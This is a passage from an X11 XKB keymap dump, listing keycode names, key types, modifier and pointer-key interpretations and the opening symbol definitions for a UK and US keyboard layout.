<FK01> = 67;
<FK02> = 68;
<FK03> = 69;
<FK04> = 70;
<FK05> = 71;
<FK06> = 72;
<FK07> = 73;
<FK08> = 74;
<FK09> = 75;
<FK10> = 76;
<NMLK> = 77;
<SCLK> = 78;
<KP7> = 79;
<KP8> = 80;
<KP9> = 81;
<KPSU> = 82;
<KP4> = 83;
<KP5> = 84;
<KP6> = 85;
<KPAD> = 86;
<KP1> = 87;
<KP2> = 88;
<KP3> = 89;
<KP0> = 90;
<KPDL> = 91;
<LVL3> = 92;
<LSGT> = 94;
<FK11> = 95;
<FK12> = 96;
<AB11> = 97;
<KATA> = 98;
<HIRA> = 99;
<HENK> = 100;
<HKTG> = 101;
<MUHE> = 102;
<JPCM> = 103;
<KPEN> = 104;
<RCTL> = 105;
<KPDV> = 106;
<PRSC> = 107;
<RALT> = 108;
<LNFD> = 109;
<HOME> = 110;
<UP> = 111;
<PGUP> = 112;
<LEFT> = 113;
<RGHT> = 114;
<END> = 115;
<DOWN> = 116;
<PGDN> = 117;
<INS> = 118;
<DELE> = 119;
<I120> = 120;
<MUTE> = 121;
<VOL-> = 122;
<VOL+> = 123;
<POWR> = 124;
<KPEQ> = 125;
<I126> = 126;
<PAUS> = 127;
<I128> = 128;
<I129> = 129;
<HNGL> = 130;
<HJCV> = 131;
<AE13> = 132;
<LWIN> = 133;
<RWIN> = 134;
<COMP> = 135;
<STOP> = 136;
<AGAI> = 137;
<PROP> = 138;
<UNDO> = 139;
<FRNT> = 140;
<COPY> = 141;
<OPEN> = 142;
<PAST> = 143;
<FIND> = 144;
<CUT> = 145;
<HELP> = 146;
<I147> = 147;
<I148> = 148;
<I149> = 149;
<I150> = 150;
<I151> = 151;
<I152> = 152;
<I153> = 153;
<I154> = 154;
<I155> = 155;
<I156> = 156;
<I157> = 157;
<I158> = 158;
<I159> = 159;
<I160> = 160;
<I161> = 161;
<I162> = 162;
<I163> = 163;
<I164> = 164;
<I165> = 165;
<I166> = 166;
<I167> = 167;
<I168> = 168;
<I169> = 169;
<I170> = 170;
<I171> = 171;
<I172> = 172;
<I173> = 173;
<I174> = 174;
<I175> = 175;
<I176> = 176;
<I177> = 177;
<I178> = 178;
<I179> = 179;
<I180> = 180;
<I181> = 181;
<I182> = 182;
<I183> = 183;
<I184> = 184;
<I185> = 185;
<I186> = 186;
<I187> = 187;
<I188> = 188;
<I189> = 189;
<I190> = 190;
<FK13> = 191;
<FK14> = 192;
<FK15> = 193;
<FK16> = 194;
<FK17> = 195;
<FK18> = 196;
<FK19> = 197;
<FK20> = 198;
<FK21> = 199;
<FK22> = 200;
<FK23> = 201;
<FK24> = 202;
<MDSW> = 203;
<ALT> = 204;
<META> = 205;
<SUPR> = 206;
<HYPR> = 207;
<I208> = 208;
<I209> = 209;
<I210> = 210;
<I211> = 211;
<I212> = 212;
<I213> = 213;
<I214> = 214;
<I215> = 215;
<I216> = 216;
<I217> = 217;
<I218> = 218;
<I219> = 219;
<I220> = 220;
<I221> = 221;
<I222> = 222;
<I223> = 223;
<I224> = 224;
<I225> = 225;
<I226> = 226;
<I227> = 227;
<I228> = 228;
<I229> = 229;
<I230> = 230;
<I231> = 231;
<I232> = 232;
<I233> = 233;
<I234> = 234;
<I235> = 235;
<I236> = 236;
<I237> = 237;
<I238> = 238;
<I239> = 239;
<I240> = 240;
<I241> = 241;
<I242> = 242;
<I243> = 243;
<I244> = 244;
<I245> = 245;
<I246> = 246;
<I247> = 247;
<I248> = 248;
<I249> = 249;
<I250> = 250;
<I251> = 251;
<I252> = 252;
<I253> = 253;
indicator 1 = "Caps Lock";
indicator 2 = "Num Lock";
indicator 3 = "Scroll Lock";
indicator 4 = "Compose";
indicator 5 = "Kana";
indicator 6 = "Sleep";
indicator 7 = "Suspend";
indicator 8 = "Mute";
indicator 9 = "Misc";
indicator 10 = "Mail";
indicator 11 = "Charging";
virtual indicator 12 = "Shift Lock";
virtual indicator 13 = "Group 2";
virtual indicator 14 = "Mouse Keys";
alias <AC12> = <BKSL>;
alias <MENU> = <COMP>;
alias <HZTG> = <TLDE>;
alias <LMTA> = <LWIN>;
alias <RMTA> = <RWIN>;
alias <ALGR> = <RALT>;
alias <KPPT> = <I129>;
alias <LatQ> = <AD01>;
alias <LatW> = <AD02>;
alias <LatE> = <AD03>;
alias <LatR> = <AD04>;
alias <LatT> = <AD05>;
alias <LatY> = <AD06>;
alias <LatU> = <AD07>;
alias <LatI> = <AD08>;
alias <LatO> = <AD09>;
alias <LatP> = <AD10>;
alias <LatA> = <AC01>;
alias <LatS> = <AC02>;
alias <LatD> = <AC03>;
alias <LatF> = <AC04>;
alias <LatG> = <AC05>;
alias <LatH> = <AC06>;
alias <LatJ> = <AC07>;
alias <LatK> = <AC08>;
alias <LatL> = <AC09>;
alias <LatZ> = <AB01>;
alias <LatX> = <AB02>;
alias <LatC> = <AB03>;
alias <LatV> = <AB04>;
alias <LatB> = <AB05>;
alias <LatN> = <AB06>;
alias <LatM> = <AB07>;
};
xkb_types "complete" {
virtual_modifiers NumLock,Alt,LevelThree,LAlt,RAlt,RControl,LControl,ScrollLock,LevelFive,AltGr,Meta,Super,Hyper;
type "ONE_LEVEL" {
modifiers= none;
level_name[Level1]= "Any";
};
type "TWO_LEVEL" {
modifiers= Shift;
map[Shift]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
};
type "ALPHABETIC" {
modifiers= Shift+Lock;
map[Shift]= Level2;
map[Lock]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "Caps";
};
type "KEYPAD" {
modifiers= Shift+NumLock;
map[Shift]= Level2;
map[NumLock]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "Number";
};
type "SHIFT+ALT" {
modifiers= Shift+Alt;
map[Shift+Alt]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "Shift+Alt";
};
type "PC_SUPER_LEVEL2" {
modifiers= Mod4;
map[Mod4]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "Super";
};
type "PC_CONTROL_LEVEL2" {
modifiers= Control;
map[Control]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "Control";
};
type "PC_LCONTROL_LEVEL2" {
modifiers= LControl;
map[LControl]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "LControl";
};
type "PC_RCONTROL_LEVEL2" {
modifiers= RControl;
map[RControl]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "RControl";
};
type "PC_ALT_LEVEL2" {
modifiers= Alt;
map[Alt]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "Alt";
};
type "PC_LALT_LEVEL2" {
modifiers= LAlt;
map[LAlt]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "LAlt";
};
type "PC_RALT_LEVEL2" {
modifiers= RAlt;
map[RAlt]= Level2;
level_name[Level1]= "Base";
level_name[Level2]= "RAlt";
};
type "CTRL+ALT" {
modifiers= Shift+Control+Alt+LevelThree;
map[Shift]= Level2;
preserve[Shift]= Shift;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
preserve[Shift+LevelThree]= Shift;
map[Control+Alt]= Level5;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "Alt Base";
level_name[Level4]= "Shift Alt";
level_name[Level5]= "Ctrl+Alt";
};
type "LOCAL_EIGHT_LEVEL" {
modifiers= Shift+Lock+Control+LevelThree;
map[Shift+Lock]= Level1;
map[Shift]= Level2;
map[Lock]= Level2;
map[LevelThree]= Level3;
map[Shift+Lock+LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
map[Lock+LevelThree]= Level4;
map[Control]= Level5;
map[Shift+Lock+Control]= Level5;
map[Shift+Control]= Level6;
map[Lock+Control]= Level6;
map[Control+LevelThree]= Level7;
map[Shift+Lock+Control+LevelThree]= Level7;
map[Shift+Control+LevelThree]= Level8;
map[Lock+Control+LevelThree]= Level8;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "Level3";
level_name[Level4]= "Shift Level3";
level_name[Level5]= "Ctrl";
level_name[Level6]= "Shift Ctrl";
level_name[Level7]= "Level3 Ctrl";
level_name[Level8]= "Shift Level3 Ctrl";
};
type "THREE_LEVEL" {
modifiers= Shift+LevelThree;
map[Shift]= Level2;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level3;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "Level3";
};
type "EIGHT_LEVEL" {
modifiers= Shift+LevelThree+LevelFive;
map[Shift]= Level2;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
map[LevelFive]= Level5;
map[Shift+LevelFive]= Level6;
map[LevelThree+LevelFive]= Level7;
map[Shift+LevelThree+LevelFive]= Level8;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "Alt Base";
level_name[Level4]= "Shift Alt";
level_name[Level5]= "X";
level_name[Level6]= "X Shift";
level_name[Level7]= "X Alt Base";
level_name[Level8]= "X Shift Alt";
};
type "EIGHT_LEVEL_ALPHABETIC" {
modifiers= Shift+Lock+LevelThree+LevelFive;
map[Shift]= Level2;
map[Lock]= Level2;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
map[Lock+LevelThree]= Level4;
map[Shift+Lock+LevelThree]= Level3;
map[LevelFive]= Level5;
map[Shift+LevelFive]= Level6;
map[Lock+LevelFive]= Level6;
map[LevelThree+LevelFive]= Level7;
map[Shift+LevelThree+LevelFive]= Level8;
map[Lock+LevelThree+LevelFive]= Level8;
map[Shift+Lock+LevelThree+LevelFive]= Level7;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "Alt Base";
level_name[Level4]= "Shift Alt";
level_name[Level5]= "X";
level_name[Level6]= "X Shift";
level_name[Level7]= "X Alt Base";
level_name[Level8]= "X Shift Alt";
};
type "EIGHT_LEVEL_SEMIALPHABETIC" {
modifiers= Shift+Lock+LevelThree+LevelFive;
map[Shift]= Level2;
map[Lock]= Level2;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
map[Lock+LevelThree]= Level3;
preserve[Lock+LevelThree]= Lock;
map[Shift+Lock+LevelThree]= Level4;
preserve[Shift+Lock+LevelThree]= Lock;
map[LevelFive]= Level5;
map[Shift+LevelFive]= Level6;
map[Lock+LevelFive]= Level6;
preserve[Lock+LevelFive]= Lock;
map[Shift+Lock+LevelFive]= Level6;
preserve[Shift+Lock+LevelFive]= Lock;
map[LevelThree+LevelFive]= Level7;
map[Shift+LevelThree+LevelFive]= Level8;
map[Lock+LevelThree+LevelFive]= Level7;
preserve[Lock+LevelThree+LevelFive]= Lock;
map[Shift+Lock+LevelThree+LevelFive]= Level8;
preserve[Shift+Lock+LevelThree+LevelFive]= Lock;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "Alt Base";
level_name[Level4]= "Shift Alt";
level_name[Level5]= "X";
level_name[Level6]= "X Shift";
level_name[Level7]= "X Alt Base";
level_name[Level8]= "X Shift Alt";
};
type "FOUR_LEVEL" {
modifiers= Shift+LevelThree;
map[Shift]= Level2;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "Alt Base";
level_name[Level4]= "Shift Alt";
};
type "FOUR_LEVEL_ALPHABETIC" {
modifiers= Shift+Lock+LevelThree;
map[Shift]= Level2;
map[Lock]= Level2;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
map[Lock+LevelThree]= Level4;
map[Shift+Lock+LevelThree]= Level3;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "Alt Base";
level_name[Level4]= "Shift Alt";
};
type "FOUR_LEVEL_SEMIALPHABETIC" {
modifiers= Shift+Lock+LevelThree;
map[Shift]= Level2;
map[Lock]= Level2;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
map[Lock+LevelThree]= Level3;
preserve[Lock+LevelThree]= Lock;
map[Shift+Lock+LevelThree]= Level4;
preserve[Shift+Lock+LevelThree]= Lock;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "Alt Base";
level_name[Level4]= "Shift Alt";
};
type "FOUR_LEVEL_MIXED_KEYPAD" {
modifiers= Shift+NumLock+LevelThree;
map[Shift+NumLock]= Level1;
map[NumLock]= Level2;
map[Shift]= Level2;
map[LevelThree]= Level3;
map[NumLock+LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
map[Shift+NumLock+LevelThree]= Level4;
level_name[Level1]= "Base";
level_name[Level2]= "Number";
level_name[Level3]= "Alt Base";
level_name[Level4]= "Shift Alt";
};
type "FOUR_LEVEL_X" {
modifiers= Shift+Control+Alt+LevelThree;
map[LevelThree]= Level2;
map[Shift+LevelThree]= Level3;
map[Control+Alt]= Level4;
level_name[Level1]= "Base";
level_name[Level2]= "Alt Base";
level_name[Level3]= "Shift Alt";
level_name[Level4]= "Ctrl+Alt";
};
type "SEPARATE_CAPS_AND_SHIFT_ALPHABETIC" {
modifiers= Shift+Lock+LevelThree;
map[Shift]= Level2;
map[Lock]= Level4;
preserve[Lock]= Lock;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
map[Lock+LevelThree]= Level3;
preserve[Lock+LevelThree]= Lock;
map[Shift+Lock+LevelThree]= Level3;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "AltGr Base";
level_name[Level4]= "Shift AltGr";
};
type "FOUR_LEVEL_PLUS_LOCK" {
modifiers= Shift+Lock+LevelThree;
map[Shift]= Level2;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
map[Lock]= Level5;
map[Shift+Lock]= Level2;
map[Lock+LevelThree]= Level3;
map[Shift+Lock+LevelThree]= Level4;
level_name[Level1]= "Base";
level_name[Level2]= "Shift";
level_name[Level3]= "Alt Base";
level_name[Level4]= "Shift Alt";
level_name[Level5]= "Lock";
};
type "FOUR_LEVEL_KEYPAD" {
modifiers= Shift+NumLock+LevelThree;
map[Shift]= Level2;
map[NumLock]= Level2;
map[LevelThree]= Level3;
map[Shift+LevelThree]= Level4;
map[NumLock+LevelThree]= Level4;
map[Shift+NumLock+LevelThree]= Level3;
level_name[Level1]= "Base";
level_name[Level2]= "Number";
level_name[Level3]= "Alt Base";
level_name[Level4]= "Alt Number";
};
};
xkb_compatibility "complete" {
virtual_modifiers NumLock,Alt,LevelThree,LAlt,RAlt,RControl,LControl,ScrollLock,LevelFive,AltGr,Meta,Super,Hyper;
interpret.useModMapMods= AnyLevel;
interpret.repeat= False;
interpret.locking= False;
interpret ISO_Level2_Latch+Exactly(Shift) {
useModMapMods=level1;
action= LatchMods(modifiers=Shift,clearLocks,latchToLock);
};
interpret Shift_Lock+AnyOf(Shift+Lock) {
action= LockMods(modifiers=Shift);
};
interpret Num_Lock+AnyOf(all) {
virtualModifier= NumLock;
action= LockMods(modifiers=NumLock);
};
interpret ISO_Level3_Shift+AnyOf(all) {
virtualModifier= LevelThree;
useModMapMods=level1;
action= SetMods(modifiers=LevelThree,clearLocks);
};
interpret ISO_Level3_Latch+AnyOf(all) {
virtualModifier= LevelThree;
useModMapMods=level1;
action= LatchMods(modifiers=LevelThree,clearLocks,latchToLock);
};
interpret ISO_Level3_Lock+AnyOf(all) {
virtualModifier= LevelThree;
useModMapMods=level1;
action= LockMods(modifiers=LevelThree);
};
interpret Alt_L+AnyOf(all) {
virtualModifier= Alt;
action= SetMods(modifiers=modMapMods,clearLocks);
};
interpret Alt_R+AnyOf(all) {
virtualModifier= Alt;
action= SetMods(modifiers=modMapMods,clearLocks);
};
interpret Meta_L+AnyOf(all) {
virtualModifier= Meta;
action= SetMods(modifiers=modMapMods,clearLocks);
};
interpret Meta_R+AnyOf(all) {
virtualModifier= Meta;
action= SetMods(modifiers=modMapMods,clearLocks);
};
interpret Super_L+AnyOf(all) {
virtualModifier= Super;
action= SetMods(modifiers=modMapMods,clearLocks);
};
interpret Super_R+AnyOf(all) {
virtualModifier= Super;
action= SetMods(modifiers=modMapMods,clearLocks);
};
interpret Hyper_L+AnyOf(all) {
virtualModifier= Hyper;
action= SetMods(modifiers=modMapMods,clearLocks);
};
interpret Hyper_R+AnyOf(all) {
virtualModifier= Hyper;
action= SetMods(modifiers=modMapMods,clearLocks);
};
interpret Scroll_Lock+AnyOf(all) {
virtualModifier= ScrollLock;
action= LockMods(modifiers=modMapMods);
};
interpret ISO_Level5_Shift+AnyOf(all) {
virtualModifier= LevelFive;
useModMapMods=level1;
action= SetMods(modifiers=LevelFive,clearLocks);
};
interpret ISO_Level5_Latch+AnyOf(all) {
virtualModifier= LevelFive;
useModMapMods=level1;
action= LatchMods(modifiers=LevelFive,clearLocks,latchToLock);
};
interpret ISO_Level5_Lock+AnyOf(all) {
virtualModifier= LevelFive;
useModMapMods=level1;
action= LockMods(modifiers=LevelFive);
};
interpret Mode_switch+AnyOfOrNone(all) {
virtualModifier= AltGr;
useModMapMods=level1;
action= SetGroup(group=+1);
};
interpret ISO_Level3_Shift+AnyOfOrNone(all) {
action= SetMods(modifiers=LevelThree,clearLocks);
};
interpret ISO_Level3_Latch+AnyOfOrNone(all) {
action= LatchMods(modifiers=LevelThree,clearLocks,latchToLock);
};
interpret ISO_Level3_Lock+AnyOfOrNone(all) {
action= LockMods(modifiers=LevelThree);
};
interpret ISO_Group_Latch+AnyOfOrNone(all) {
virtualModifier= AltGr;
useModMapMods=level1;
action= LatchGroup(group=2);
};
interpret ISO_Next_Group+AnyOfOrNone(all) {
virtualModifier= AltGr;
useModMapMods=level1;
action= LockGroup(group=+1);
};
interpret ISO_Prev_Group+AnyOfOrNone(all) {
virtualModifier= AltGr;
useModMapMods=level1;
action= LockGroup(group=-1);
};
interpret ISO_First_Group+AnyOfOrNone(all) {
action= LockGroup(group=1);
};
interpret ISO_Last_Group+AnyOfOrNone(all) {
action= LockGroup(group=2);
};
interpret KP_1+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=-1,y=+1);
};
interpret KP_End+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=-1,y=+1);
};
interpret KP_2+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+0,y=+1);
};
interpret KP_Down+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+0,y=+1);
};
interpret KP_3+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+1,y=+1);
};
interpret KP_Next+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+1,y=+1);
};
interpret KP_4+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=-1,y=+0);
};
interpret KP_Left+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=-1,y=+0);
};
interpret KP_6+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+1,y=+0);
};
interpret KP_Right+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+1,y=+0);
};
interpret KP_7+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=-1,y=-1);
};
interpret KP_Home+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=-1,y=-1);
};
interpret KP_8+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+0,y=-1);
};
interpret KP_Up+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+0,y=-1);
};
interpret KP_9+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+1,y=-1);
};
interpret KP_Prior+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+1,y=-1);
};
interpret KP_5+AnyOfOrNone(all) {
repeat= True;
action= PtrBtn(button=default);
};
interpret KP_Begin+AnyOfOrNone(all) {
repeat= True;
action= PtrBtn(button=default);
};
interpret KP_F2+AnyOfOrNone(all) {
repeat= True;
action= SetPtrDflt(affect=button,button=1);
};
interpret KP_Divide+AnyOfOrNone(all) {
repeat= True;
action= SetPtrDflt(affect=button,button=1);
};
interpret KP_F3+AnyOfOrNone(all) {
repeat= True;
action= SetPtrDflt(affect=button,button=2);
};
interpret KP_Multiply+AnyOfOrNone(all) {
repeat= True;
action= SetPtrDflt(affect=button,button=2);
};
interpret KP_F4+AnyOfOrNone(all) {
repeat= True;
action= SetPtrDflt(affect=button,button=3);
};
interpret KP_Subtract+AnyOfOrNone(all) {
repeat= True;
action= SetPtrDflt(affect=button,button=3);
};
interpret KP_Separator+AnyOfOrNone(all) {
repeat= True;
action= PtrBtn(button=default,count=2);
};
interpret KP_Add+AnyOfOrNone(all) {
repeat= True;
action= PtrBtn(button=default,count=2);
};
interpret KP_0+AnyOfOrNone(all) {
repeat= True;
action= LockPtrBtn(button=default,affect=lock);
};
interpret KP_Insert+AnyOfOrNone(all) {
repeat= True;
action= LockPtrBtn(button=default,affect=lock);
};
interpret KP_Decimal+AnyOfOrNone(all) {
repeat= True;
action= LockPtrBtn(button=default,affect=unlock);
};
interpret KP_Delete+AnyOfOrNone(all) {
repeat= True;
action= LockPtrBtn(button=default,affect=unlock);
};
interpret F25+AnyOfOrNone(all) {
repeat= True;
action= SetPtrDflt(affect=button,button=1);
};
interpret F26+AnyOfOrNone(all) {
repeat= True;
action= SetPtrDflt(affect=button,button=2);
};
interpret F27+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=-1,y=-1);
};
interpret F29+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+1,y=-1);
};
interpret F31+AnyOfOrNone(all) {
repeat= True;
action= PtrBtn(button=default);
};
interpret F33+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=-1,y=+1);
};
interpret F35+AnyOfOrNone(all) {
repeat= True;
action= MovePtr(x=+1,y=+1);
};
interpret Pointer_Button_Dflt+AnyOfOrNone(all) {
action= PtrBtn(button=default);
};
interpret Pointer_Button1+AnyOfOrNone(all) {
action= PtrBtn(button=1);
};
interpret Pointer_Button2+AnyOfOrNone(all) {
action= PtrBtn(button=2);
};
interpret Pointer_Button3+AnyOfOrNone(all) {
action= PtrBtn(button=3);
};
interpret Pointer_DblClick_Dflt+AnyOfOrNone(all) {
action= PtrBtn(button=default,count=2);
};
interpret Pointer_DblClick1+AnyOfOrNone(all) {
action= PtrBtn(button=1,count=2);
};
interpret Pointer_DblClick2+AnyOfOrNone(all) {
action= PtrBtn(button=2,count=2);
};
interpret Pointer_DblClick3+AnyOfOrNone(all) {
action= PtrBtn(button=3,count=2);
};
interpret Pointer_Drag_Dflt+AnyOfOrNone(all) {
action= LockPtrBtn(button=default,affect=both);
};
interpret Pointer_Drag1+AnyOfOrNone(all) {
action= LockPtrBtn(button=1,affect=both);
};
interpret Pointer_Drag2+AnyOfOrNone(all) {
action= LockPtrBtn(button=2,affect=both);
};
interpret Pointer_Drag3+AnyOfOrNone(all) {
action= LockPtrBtn(button=3,affect=both);
};
interpret Pointer_EnableKeys+AnyOfOrNone(all) {
action= LockControls(controls=MouseKeys);
};
interpret Pointer_Accelerate+AnyOfOrNone(all) {
action= LockControls(controls=MouseKeysAccel);
};
interpret Pointer_DfltBtnNext+AnyOfOrNone(all) {
action= SetPtrDflt(affect=button,button=+1);
};
interpret Pointer_DfltBtnPrev+AnyOfOrNone(all) {
action= SetPtrDflt(affect=button,button=-1);
};
interpret AccessX_Enable+AnyOfOrNone(all) {
action= LockControls(controls=AccessXKeys);
};
interpret AccessX_Feedback_Enable+AnyOfOrNone(all) {
action= LockControls(controls=AccessXFeedback);
};
interpret RepeatKeys_Enable+AnyOfOrNone(all) {
action= LockControls(controls=RepeatKeys);
};
interpret SlowKeys_Enable+AnyOfOrNone(all) {
action= LockControls(controls=SlowKeys);
};
interpret BounceKeys_Enable+AnyOfOrNone(all) {
action= LockControls(controls=BounceKeys);
};
interpret StickyKeys_Enable+AnyOfOrNone(all) {
action= LockControls(controls=StickyKeys);
};
interpret MouseKeys_Enable+AnyOfOrNone(all) {
action= LockControls(controls=MouseKeys);
};
interpret MouseKeys_Accel_Enable+AnyOfOrNone(all) {
action= LockControls(controls=MouseKeysAccel);
};
interpret Overlay1_Enable+AnyOfOrNone(all) {
action= LockControls(controls=Overlay1);
};
interpret Overlay2_Enable+AnyOfOrNone(all) {
action= LockControls(controls=Overlay2);
};
interpret AudibleBell_Enable+AnyOfOrNone(all) {
action= LockControls(controls=AudibleBell);
};
interpret Terminate_Server+AnyOfOrNone(all) {
action= Terminate();
};
interpret Alt_L+AnyOfOrNone(all) {
action= SetMods(modifiers=Alt,clearLocks);
};
interpret Alt_R+AnyOfOrNone(all) {
action= SetMods(modifiers=Alt,clearLocks);
};
interpret Meta_L+AnyOfOrNone(all) {
action= SetMods(modifiers=Meta,clearLocks);
};
interpret Meta_R+AnyOfOrNone(all) {
action= SetMods(modifiers=Meta,clearLocks);
};
interpret Super_L+AnyOfOrNone(all) {
action= SetMods(modifiers=Super,clearLocks);
};
interpret Super_R+AnyOfOrNone(all) {
action= SetMods(modifiers=Super,clearLocks);
};
interpret Hyper_L+AnyOfOrNone(all) {
action= SetMods(modifiers=Hyper,clearLocks);
};
interpret Hyper_R+AnyOfOrNone(all) {
action= SetMods(modifiers=Hyper,clearLocks);
};
interpret Shift_L+AnyOfOrNone(all) {
action= SetMods(modifiers=Shift,clearLocks);
};
interpret XF86Switch_VT_1+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=1,!same);
};
interpret XF86Switch_VT_2+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=2,!same);
};
interpret XF86Switch_VT_3+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=3,!same);
};
interpret XF86Switch_VT_4+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=4,!same);
};
interpret XF86Switch_VT_5+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=5,!same);
};
interpret XF86Switch_VT_6+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=6,!same);
};
interpret XF86Switch_VT_7+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=7,!same);
};
interpret XF86Switch_VT_8+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=8,!same);
};
interpret XF86Switch_VT_9+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=9,!same);
};
interpret XF86Switch_VT_10+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=10,!same);
};
interpret XF86Switch_VT_11+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=11,!same);
};
interpret XF86Switch_VT_12+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=12,!same);
};
interpret XF86LogGrabInfo+AnyOfOrNone(all) {
repeat= True;
action= Private(type=0x86,data[0]=0x50,data[1]=0x72,data[2]=0x47,data[3]=0x72,data[4]=0x62,data[5]=0x73,data[6]=0x00);
};
interpret XF86LogWindowTree+AnyOfOrNone(all) {
repeat= True;
action= Private(type=0x86,data[0]=0x50,data[1]=0x72,data[2]=0x57,data[3]=0x69,data[4]=0x6e,data[5]=0x73,data[6]=0x00);
};
interpret XF86Next_VMode+AnyOfOrNone(all) {
repeat= True;
action= Private(type=0x86,data[0]=0x2b,data[1]=0x56,data[2]=0x4d,data[3]=0x6f,data[4]=0x64,data[5]=0x65,data[6]=0x00);
};
interpret XF86Prev_VMode+AnyOfOrNone(all) {
repeat= True;
action= Private(type=0x86,data[0]=0x2d,data[1]=0x56,data[2]=0x4d,data[3]=0x6f,data[4]=0x64,data[5]=0x65,data[6]=0x00);
};
interpret ISO_Level5_Shift+AnyOfOrNone(all) {
action= SetMods(modifiers=LevelFive,clearLocks);
};
interpret ISO_Level5_Latch+AnyOfOrNone(all) {
action= LatchMods(modifiers=LevelFive,clearLocks,latchToLock);
};
interpret ISO_Level5_Lock+AnyOfOrNone(all) {
action= LockMods(modifiers=LevelFive);
};
interpret Caps_Lock+AnyOfOrNone(all) {
action= LockMods(modifiers=Lock);
};
interpret Any+Exactly(Lock) {
action= LockMods(modifiers=Lock);
};
interpret Any+AnyOf(all) {
action= SetMods(modifiers=modMapMods,clearLocks);
};
group 2 = AltGr;
group 3 = AltGr;
group 4 = AltGr;
indicator "Caps Lock" {
!allowExplicit;
whichModState= locked;
modifiers= Lock;
};
indicator "Num Lock" {
!allowExplicit;
whichModState= locked;
modifiers= NumLock;
};
indicator "Scroll Lock" {
whichModState= locked;
modifiers= ScrollLock;
};
indicator "Shift Lock" {
!allowExplicit;
whichModState= locked;
modifiers= Shift;
};
indicator "Group 2" {
!allowExplicit;
groups= 0xfe;
};
indicator "Mouse Keys" {
indicatorDrivesKeyboard;
controls= mouseKeys;
};
};
xkb_symbols "pc+gb+us:2+inet(evdev)+compose(ralt)" {
name[group1]="English (UK)";
name[group2]="English (US)";
key <ESC> { [ Escape ] };
key <AE01> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ 1, exclam, onesuperior, exclamdown ],
symbols[Group2]= [ 1, exclam ]
};
key <AE02> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ 2, quotedbl, twosuperior, oneeighth ],
symbols[Group2]= [ 2, at ]
};
key <AE03> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ 3, sterling, threesuperior, sterling ],
symbols[Group2]= [ 3, numbersign ]
};
key <AE04> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ 4, dollar, EuroSign, onequarter ],
symbols[Group2]= [ 4, dollar ]
};
key <AE05> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ 5, percent, onehalf, threeeighths ],
symbols[Group2]= [ 5, percent ]
};
key <AE06> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ 6, asciicircum, threequarters, fiveeighths ],
symbols[Group2]= [ 6, asciicircum ]
};
key <AE07> {
type[group1]= "FOUR_LEVEL",
